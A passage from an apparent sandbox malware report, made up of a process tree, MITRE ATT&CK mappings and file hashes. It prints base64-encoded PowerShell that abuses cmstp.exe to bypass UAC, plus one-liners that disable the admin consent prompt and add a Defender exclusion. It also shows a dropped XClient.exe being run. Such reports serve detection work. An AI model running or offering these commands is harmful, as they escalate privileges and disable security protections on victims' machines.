cgBlACAAPQBgACQAYwBoAGkAYwBhAGcAbwBgACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgAgAD0AIAAyAC4ANQANAAoAWwBEAGUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAPQAgAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAA0ACgBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzACAAPQAgAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgANAAoAWwBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4AXQANAAoAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQANAAoAdABhAHMAawBrAGkAbABsACAALwBJAE0AIABjAG0AcwB0AHAALgBlAHgAZQAgAC8ARgANAAoAWwBDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwBdAA0ACgA0ADkAMAAwADAALAA0ADkAMAAwADEAPQBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuACwAIAA3AA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAIABQAGEAdABoAHMAXABDAE0ATQBHAFIAMwAyAC4ARQBYAEUAIgAsACAAIgBQAHIAbwBmAGkAbABlAEkAbgBzAHQAYQBsAGwAUABhAHQAaAAiACwAIAAiACUAVQBuAGUAeABwAGUAYwB0AGUAZABFAHIAcgBvAHIAJQAiACwAIAAiACIADQAKAFsAUwB0AHIAaQBuAGcAcwBdAA0ACgBTAGUAcgB2AGkAYwBlAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAUwBoAG8AcgB0AFMAdgBjAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAIgBAADsAJABJAG4AZgBDAG8AbgB0AGUAbgB0ACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIAAtAEUAbgBjAG8AZABpAG4AZwAgAEEAUwBDAEkASQB9AEYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0ASAB3AG4AZAB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwB0AG8AcAAnADsAVAByAHkAewAkAGgAdwBuAGQAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQA7AH0AQwBhAHQAYwBoAHsAJABoAHcAbgBkAD0AJABuAHUAbABsADsAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwBOAGEAbQBlAD0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkADsAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQBmAHUAbgBjAHQAaQBvAG4AIABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABoAHcAbgBkAD0ARwBlAHQALQBIAHcAbgBkACAALQBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAkAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAASAB3AG4AZAA7AFsAaQBuAHQAXQAkAGgAYQBuAGQAbABlAD0AJABoAHcAbgBkADsAaQBmACgAJABoAGEAbgBkAGwAZQAgAC0AZwB0ACAAMAApAHsAWwB2AG8AaQBkAF0AWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAJABoAGEAbgBkAGwAZQAsAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFcATQBfAEMASABBAFIALAAxADMALAAwACkAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwA9ACQATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQA7AC4AIABTAGUAdAAtAEkATgBGAEYAaQBsAGUAOwBhAGQAZAAtAHQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsASQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACkAewBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAYwBtAHMAdABwACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALwBhAHUAIAAiACIAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAiACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBpAG4AaQBtAGkAegBlAGQAOwBkAG8AewB9AHUAbgB0AGkAbAAoACgAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQAgAGMAbQBzAHQAcAApAC4ASAB3AG4AZAAgAC0AbgBlACAAMAApAH0ADQAKAA==
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3rv3utvl\3rv3utvl.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD968.tmp" "c:\Users\Admin\AppData\Local\Temp\3rv3utvl\CSCE80CF968D5D24534B3CBD8FF7FE4195.TMP"
        9⤵
        
        PID:4780
        
        C:\Windows\system32\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
        8⤵
        
        PID:2652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAUgBlAGQATABpAG4AZQAuAGUAeABlACAAJwApACQASQBuAGYAQwBvAG4AdABlAG4AdAA9AEAAIgANAAoAWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUAcgBlACAAPQBgACQAYwBoAGkAYwBhAGcAbwBgACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgAgAD0AIAAyAC4ANQANAAoAWwBEAGUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAPQAgAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAA0ACgBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzACAAPQAgAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgANAAoAWwBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4AXQANAAoAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQANAAoAdABhAHMAawBrAGkAbABsACAALwBJAE0AIABjAG0AcwB0AHAALgBlAHgAZQAgAC8ARgANAAoAWwBDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwBdAA0ACgA0ADkAMAAwADAALAA0ADkAMAAwADEAPQBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuACwAIAA3AA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAIABQAGEAdABoAHMAXABDAE0ATQBHAFIAMwAyAC4ARQBYAEUAIgAsACAAIgBQAHIAbwBmAGkAbABlAEkAbgBzAHQAYQBsAGwAUABhAHQAaAAiACwAIAAiACUAVQBuAGUAeABwAGUAYwB0AGUAZABFAHIAcgBvAHIAJQAiACwAIAAiACIADQAKAFsAUwB0AHIAaQBuAGcAcwBdAA0ACgBTAGUAcgB2AGkAYwBlAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAUwBoAG8AcgB0AFMAdgBjAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAIgBAADsAJABJAG4AZgBDAG8AbgB0AGUAbgB0ACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIAAtAEUAbgBjAG8AZABpAG4AZwAgAEEAUwBDAEkASQB9AEYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0ASAB3AG4AZAB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwB0AG8AcAAnADsAVAByAHkAewAkAGgAdwBuAGQAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQA7AH0AQwBhAHQAYwBoAHsAJABoAHcAbgBkAD0AJABuAHUAbABsADsAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwBOAGEAbQBlAD0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkADsAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQBmAHUAbgBjAHQAaQBvAG4AIABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABoAHcAbgBkAD0ARwBlAHQALQBIAHcAbgBkACAALQBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAkAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAASAB3AG4AZAA7AFsAaQBuAHQAXQAkAGgAYQBuAGQAbABlAD0AJABoAHcAbgBkADsAaQBmACgAJABoAGEAbgBkAGwAZQAgAC0AZwB0ACAAMAApAHsAWwB2AG8AaQBkAF0AWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAJABoAGEAbgBkAGwAZQAsAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFcATQBfAEMASABBAFIALAAxADMALAAwACkAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwA9ACQATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQA7AC4AIABTAGUAdAAtAEkATgBGAEYAaQBsAGUAOwBhAGQAZAAtAHQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsASQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACkAewBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAYwBtAHMAdABwACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALwBhAHUAIAAiACIAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAiACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBpAG4AaQBtAGkAegBlAGQAOwBkAG8AewB9AHUAbgB0AGkAbAAoACgAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQAgAGMAbQBzAHQAcAApAC4ASAB3AG4AZAAgAC0AbgBlACAAMAApAH0ADQAKAA==
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1396
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bszhpehx\bszhpehx.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1360
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF61.tmp" "c:\Users\Admin\AppData\Local\Temp\bszhpehx\CSCC5F6FE628C274497B632C75A1BA6F61.TMP"
        9⤵
        
        PID:984
        
        C:\Windows\system32\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
        8⤵
        
        PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
1⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:Temp
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:404

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Admin\AppData\Local\Temp\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a55a6701bd7791bded9b5580384ccb57

SHA1
047950dc4c071c5e94c416bc57b5cb05283b9136

SHA256
9e86d26980e05c54185fbbb0c4dbca15a692ae2f3238c97fac0e252d6bff2bff

SHA512
fd0a085dffdc39e4749b3d9051793835ca6ac33c59fa13ff37232fa791e72a461e0a2e579eb062c08d0c78b87e5e02b8921a5a54c57ff142aae2eef92d80c512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38f0f14cc7ca72ad51216866e66efb4e

SHA1
34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

SHA256
668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

SHA512
4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1bad2704664b4c1a190586ec492be65f

SHA1
1c98e6645c66774152c184d23f7a3178ce522e7b

SHA256
5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

SHA512
668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a6f66636744978303921c8ce451ac229

SHA1
7855cda1b02457481cd0b9ce9246f72cc573ddd1

SHA256
aead5b460ac7b91a5cb08152a31d948c1b78194dbb5f6574369e4e06ba32436d

SHA512
c535aebd1386224cba158305c31c152629a525cd25dcca3f8981c598a1c2c6fafe488b86d2700212291ad0b7e75487bb268f3f8b47dedeaff34ac60437665cca

Download Submit
C:\Users\Admin\AppData\Local\Temp\0dhtcnew\0dhtcnew.dll

Filesize
3KB

MD5
7e700cbac4f67538e5fab43da69e9673

SHA1
3c785a29c19c1c8dbc03d5669dabcf96e1d11aff

SHA256
5e907ec50d01247b0a2af07caaf1aa067b36d5082b77b0d0d6057636ce703e0d

SHA512
9e3ca688d36d7e1517b5d543da98d0e6267a0d1abe0f2b94852ae1660f59768d7cb0c3d883f02372013b37970680ddc66c2979af9ef286b9d2e510755e0b0f8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3rv3utvl\3rv3utvl.dll

Filesize
3KB

MD5
6317b37b08a913afbd355375ce277613

SHA1
4877cb0cf04cf5982440a6b254e2a617f08416fe

SHA256
f17032723da60f2eb278a6307bda4bf9447601d37185a7cd77583f006433f5c9

SHA512
e1995d9a982d3ebbc67bfe6a09a91797570323fe43be2226bd3b6407c8a077bc792788dde4088150a50e39bab28cf1fcf4990d028103a2d1f3548427acaf443a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

Filesize
561B

MD5
4a1161a7fdc1f531839e821b6491a258

SHA1
d80a8e11c2f244df3bde29e1b9db865c623ca4cb

SHA256
a4222a20c744b280f6d6bd2c8a4d66bf8f3f9d9ea7d4368722184f46a1634ea0

SHA512
66110b9b6aaeffce6502cdc755502ee9ff76cdc12cc0fd5a3a2c730b399824cf698d3269edb790b52ac39712c8bbee527697c65448e9d792064b904f993be9bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

Filesize
900B

MD5
768a04ae09fe541520256fc0d7dd30e2

SHA1
b2611cfc3a62f2ffafe1772a6ee924e5540c1872

SHA256
1531f6d078859d276c1db49853b47b626eb3da9171af961e476e31c9125ff14c

SHA512
5649d5750d0c4e5943bc24267dfae370fec75e77d474401569cd4201f0a33296321a9c3e9191fc9431364bfd8d5b396c9194cf0e83f092187292b5115bb29ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC41B.tmp

Filesize
1KB

MD5
42a357e885a69ce328d808a9f49d4989

SHA1
380c0a2852587731ef24e0c37d4fad1bfd0a27d3

SHA256
431cd8d4471ed2048a39b61e84f8ffffff9fd7746683fb3e52ec481ae8e157b8

SHA512
1292367c2ccb97e330ea58ec3f08687d3c3ec0d1c5dfaeaf5e316966c647e02db464c88c15d14e795f60a66e7b4892e04de72fcdc20fc3257b6a6433d7ae4040

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD968.tmp

Filesize
1KB

MD5
0066c52eb7469f305880024df4dd9b61

SHA1
bf19bb794a764fdd1fb252cbfd1f3182fdf5750d

SHA256
525c7ca11b2d3d1b618dc11ca1772b71d92d86ddeab23dd066cb5328a96c947c

SHA512
dc88b934306c50d2ac644be4344de7744338d763bc4ccc9397fef1bcfb2df02149f82b341b2b4355b4742f8c59e63c280457f4a61407c5790ae7818ce4cf5325

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEF61.tmp

Filesize
1KB

MD5
d2cfd3180aa39d3089e6764553290638

SHA1
5ccae0befb3477e754b7a3cf4e36591cf253b7f4

SHA256
77b33fccd0fefbe5b5186d104ce16c327cd64c193dc58ecdd9dc5bc66e657f1b

SHA512
42f15b4d51bedc19573886619586649be084a1fb8b2e9572df4fb1d9d022950938b1f8444ec94e7b1022138431e8de1601e162498719044209422821c604b6ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
32KB

MD5
e5f31c2d85adf65d285841220280cf4f

SHA1
67277c68a170e03f4445211fbabf2b09995a98cd

SHA256
c3bbb675ebfb5dc5d747551529c7feea42f8eeef6675d76f37afa87bcbf02ab3

SHA512
ab5dc9ab8658adbb7ad5410de895834c72414214b616e1610b874ed885f68cd615c0fcc9afe017e77e0c931d474bdd580f70a0487170a84bd2cf973685fbb26b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibuyt5ra.gi5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
